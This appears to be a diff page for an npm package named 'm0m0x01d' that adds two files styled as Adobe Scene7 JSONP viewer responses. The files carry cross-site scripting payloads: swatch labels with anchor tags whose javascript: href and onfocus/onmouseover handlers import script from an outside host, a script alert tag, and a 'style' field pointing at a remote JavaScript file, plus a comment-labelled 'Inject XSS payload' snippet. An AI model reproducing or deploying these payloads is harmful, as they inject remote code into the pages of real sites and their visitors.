m0m0x01d 33.0.0 → 35.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +1 -1
- package/x1.js +8 -0
- package/xxxxxx.js +13 -0
package/package.json
CHANGED
package/x1.js
ADDED
@@ -0,0 +1,8 @@
|
|
1
|
+
/*jsonp*/
|
2
|
+
s7sdkJSONResponse({
|
3
|
+
"WEBVTT\n\n00:00.000 --> 215:85.000\n{\n\"properties\": {\n\"title\": \"Adobe-QBP.mp4</div>xxxxxxxxxxxxxxxxxx\"\n}\n}\n\n00:00.000 --> 01:17.100\n{\"swatches\": {\"item\": [\n {\"s\": {\n \"n\": \"/content/dam/marketing/shoppable-video/qbp/products/Creative Cloud.png\",\n \"l\": \"MOUSEOVER BELOW<P><P><P><a href=javascript:import('https://me6.com/ASI/pw.js') autofocus=true onfocus=import('https://me6.com/ASI/pw.js')>MOUSEOVER HERE</a>\",\n \"href\": \"https://authorization.site\",\n \"target\": \"_blank\"\n }},\n {\"s\": {\n \"n\": \"/content/dam/marketing/shoppable-video/qbp/products/Dreamweaver.png\",\n \"l\": \"MOUSEOVER BELOW<P><P><P><a href=javascript:import('https://me6.com/ASI/pw.js') onmouseover=import('https://me6.com/ASI/pw.js')>MOUSEOVER HERE</a>\",\n \"href\": \"https://www.adobe.com/products/dreamweaver.html\",\n \"target\": \"_blank\"\n }},\n {\"s\": {\n \"n\": \"/content/dam/Geometrixx-media-new-launch/After Effects.png\",\n \"l\": \"MOUSEOVER BELOW<P><P><P><a href=javascript:import('https://me6.com/ASI/pw.js') onmouseover=import('https://me6.com/ASI/pw.js')>MOUSEOVER HERE</a>\",\n \"href\": \"https://www.adobe.com/products/aftereffects.html\",\n \"target\": \"_blank\"\n }}\n]}}\n\n01:17.100 --> 02:30.000\n{\"swatches\": {\"item\": [\n {\"s\": {\n \"n\": \"/content/dam/marketing/shoppable-video/qbp/products/Photoshop.png\",\n \"l\": \"Photoshop<script>alert(location)</script>\",\n \"href\": \"https://www.adobe.com/products/photoshop.html\",\n \"target\": \"_blank\"\n }},\n {\"s\": {\n \"n\": \"/content/dam/Geometrixx-media-new-launch/Illustrator.png\",\n \"l\": \"Illustrator\",\n \"href\": \"https://www.adobe.com/products/illustrator.html\",\n \"target\": \"_blank\"\n }},\n {\"s\": {\n \"n\": \"/content/dam/marketing/shoppable-video/qbp/products/Bridge.png\",\n \"l\": \"Bridge\",\n \"href\": \"https://creative.adobe.com/products/bridge\",\n \"target\": \"_blank\"\n }}\n]}}\n\n02:30.600 --> 03:35.400\n{\"swatches\": {\"item\": [\n {\"s\": {\n \"n\": \"/content/dam/marketing/shoppable-video/qbp/products/InDesign.png\",\n \"l\": \"InDesign\",\n \"href\": \"https://www.adobe.com/products/indesign.html\",\n \"target\": \"_blank\"\n }},\n {\"s\": {\n \"n\": \"/content/dam/marketing/shoppable-video/qbp/products/Premiere Pro.png\",\n \"l\": \"Premiere Pro\",\n \"href\": \"https://www.adobe.com/products/premiere.html\",\n \"target\": \"_blank\"\n }},\n {\"s\": {\n \"n\": \"/content/dam/marketing/shoppable-video/qbp/products/Photoshop Lightroom.png\",\n \"l\": \"Photoshop Lightroom\",\n \"href\": \"https://www.adobe.com/products/photoshop-lightroom.html\",\n \"target\": \"_blank\"\n }}\n]}}",
|
4
|
+
"24039651"),
|
5
|
+
"style": "Scene7SharedAssets/htmlviewerskins/css/html5_mixedMedia.css",
|
6
|
+
"type": "MixedMediaHTML5Mobile",
|
7
|
+
"vt": "MediaSetVirtual"
|
8
|
+
}, "192959476");
|
package/xxxxxx.js
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
/*jsonp*/
|
2
|
+
s7sdkJSONResponse({
|
3
|
+
"style": "https://brutelogic.com.br/1.js",
|
4
|
+
"type": "MixedMediaHTML5Mobile",
|
5
|
+
"vt": "MediaSetVirtual"
|
6
|
+
}, "192959476");
|
7
|
+
|
8
|
+
// Inject XSS payload after the JSONP function
|
9
|
+
(function() {
|
10
|
+
var xss_payload = document.domain;
|
11
|
+
console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
|
12
|
+
})();
|
13
|
+
|